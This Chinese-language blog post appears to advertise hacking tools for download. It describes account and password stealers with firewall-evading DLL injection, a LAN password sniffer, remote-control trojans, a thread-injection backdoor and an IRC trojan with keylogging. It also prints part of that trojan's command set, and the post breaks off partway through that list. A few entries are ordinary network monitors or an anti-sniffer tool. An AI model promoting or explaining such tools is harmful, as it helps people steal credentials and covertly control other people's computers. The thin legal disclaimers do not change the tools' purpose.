[小广播]要在本地购买杂志的读者注意了看我们在各地的代理商以及***联系方式，可以直接与他们联系购买杂志。点击这里即可观看各地代理商***。　头衔：入侵无痕
Hiddukel VI Beta 1.0针对指定软件的监控工具，可以取得指定软件的输入信息及资料，请不要非法盗取他人帐号及私人资料，并请在当地法律容许的范围内使用。这个版本增加了通过代理服务器发送截取结果的功能。
Port Logger V1.2这程序是用来监视某一个特定的TCP端口的连接情况，并将连接写入文件的程序。
这个不算是黑客程序，只能算是一个安全检测的程序罢了。程序改进了在最初版
使用的流程.最初流程:1.枚举系统端口被连接的情况(相当于netstat.exe -an的功能)2.查找要监视的端口是否被连接，如果没有，跳到第4步.3.将连接的IP和检测时间写入文件4.程序睡眠60秒，60秒后重复第1步.
现在版本的流程1.实时启动sniffer的功能，如果没有发现任何要监视的端口的连接，重复第一步;反之，跳到第二步。2.枚举系统端口被连接情况,查看是否有新的连接，或者旧的连接断开，如果有，记录下来；如果没有的话，不记录，重复第1步。
最新版本的比旧版本的优点在于实时性，只要有新的连接，就会马上检测，旧版本是要睡眠60秒后才自动检测，如果连接从连接上到断开是在那个60秒内，那么无法记录到的了。
用法：直接执行那个程序。默认是检测终端的连接情况的,如果想监视其它的端口，就将要监视的端口写到Port.txt那个文件中去，只能是写一个端口.Port.txt要和那个可执行程序放在同一个目录中去。所有记录会输出到一个叫LogFile.Log中的文件中去。
因为程序并不属于黑客程序，所以运行时还是会弹出一个窗口的(如果你是在界面双击的话)，但如果在命令行中执行，程序输出banner和要监视的端口后，就会在后台默默工作。程序只是占有很少很少的系统资源的，这在几台系统中测试过的了。
感谢作者提供。
TCPView 专业版 v1.06TCPView Professional Edition v1.06，可连续实时的监视在Windows系统上所有的TCP/IP 活动，通过TCPView Pro 系统，系统管理者可以看到针对特定应用程序所发送和收到的信息…
Ace Password Sniffer v1.1破解版Ace Password Sniffer v1.1，用来在局域网内捕获网络上的各种用户名和密码。支持smtp，pop3，ftp，telnet，http。并且支持大多数通过网页提交的密码。特别适合于家长对孩子网络访问的监控，网络管理人员对网站密码的管理，以及经理对手下员工进行监控…
水若兰汀1.4版这个工具是&血火2.1&的姊妹版，可以监视指定程序，记录下帐号，密码等。仅供学习和研究之用，因使用本程序而产生的一切不利影响，均由使用者自己负责！程序采用进程监视技术，理论上支持WINDOWS 9X下所有程序。如：&传奇&(可以记录下区号)，等等。支持邮箱接受收记录。
MiniSniffer 1.0基于W2K的网络嗅探器MiniSniffer(1.00)W2k下使用，能够***局域网上所有的数据包，并对接受到的数据包进行协议解析，给出原始网络数据，有助于进行网络程序的调试和学习。
Hiddukel V pro针对指定软件的监控工具，可以取得指定软件的输入信息及资料，请不要非法盗取他人帐号及私人资料，并请在当地法律容许的范围内使用。该版发布，在原基础上增加了保存/载入设置，智能DLL插入有效规避防火墙，中文键盘输入截获，指定窗体截取的对列表框的功能等…加上保留了以前版本的自定义截图及URL触发，自我卸载，非键盘记录截取，指定窗体监控，自定义查杀进程等功能。
者2.1密码侦探类程序的克星，密码反侦探。本程序可以对普通应用程序的密码进行保
护。可以很方便地检测你的计算机上是否有密码侦探程序在使用。非注册码提供
被侦探程序名称。注册版提供侦探程序的详细信息并可以杀死侦探程序。
这两天不知道为什么心情闷郁…所以都没把软件放上..screen.width-366)this.width=screen.width-366& border=0&
PcShare V2.0 beta1本远程控制软件为客户连接的反弹方式，由客户主动连接服务器，通信方式为HTTP隧道，可以控制局域网内部的机器。控制功能包括屏幕控制，文件操作，注册表编辑，窗口管理，进程管理、服务管理、按键记录、文件查找等大部分功能远程控制功能。文件传输支持多文件下载，并能断点续传。详细情况请见软件的帮助。
Rewind 1.0一款国外木马，压缩后97KB，比较小，不过功能也比较少，功能有对话、获取主机信息、与对方开玩笑，上传文件，SIN通知等。
风雪3.0风雪3.0版。国产远程控制程序，此版主要是增加了一个远程反***的功能（在使用说明的第2点有说明），同时加上了屏幕控制时自动传送的功能，解决了每次都要重新抓屏的缺点。
Devil4Devil4[魔鬼4号]Devil4是一个线程插入后门程序，是在Devil3的基础上改进而来的。主要做了以下修改：1、可以让用户自己配置后门的端口、密码和后门需要插入的进程。2、运行后立即生效，不再需要重新启动。程序自带了清除工具。
yulihubot 1.1IRC木马,改了几个bug，加了键盘记录。
@@sysinfo //查看系统信息@@verinfo //查看版本信息//@@sysinfo和@@verinfo在验证密码之前可以用。下面的命令就得验证密码之后才可以用@@login password //登录服务端@@pass 旧密码 新密码 //改变服务端的密码@@netinfo //查看网络信息@@reboot //重启@@shutdown //关机@@forcedown //强制关机@@logoff //注销用户@@close //
— Jungle @ 7:50 am